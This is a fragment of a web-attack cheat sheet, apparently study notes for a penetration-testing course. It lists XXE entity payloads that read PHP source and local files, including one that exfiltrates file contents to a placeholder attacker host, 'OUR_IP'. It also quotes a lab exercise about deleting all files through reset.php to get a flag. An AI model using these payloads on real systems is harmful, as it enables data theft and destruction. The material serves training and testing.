chilumine/cpts-quick-references/module/Web-Attacks.md

 | `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Read PHP source code with base64 encode filter |
 | `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">` | Reading a file through a PHP error |
 | `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">` | Reading a file OOB exfiltration |

+# Web Attack Exercises

+>Try to use what you learned in this section to access the 'reset.php' page and delete all files.
+Once all files are deleted, you should get the flag.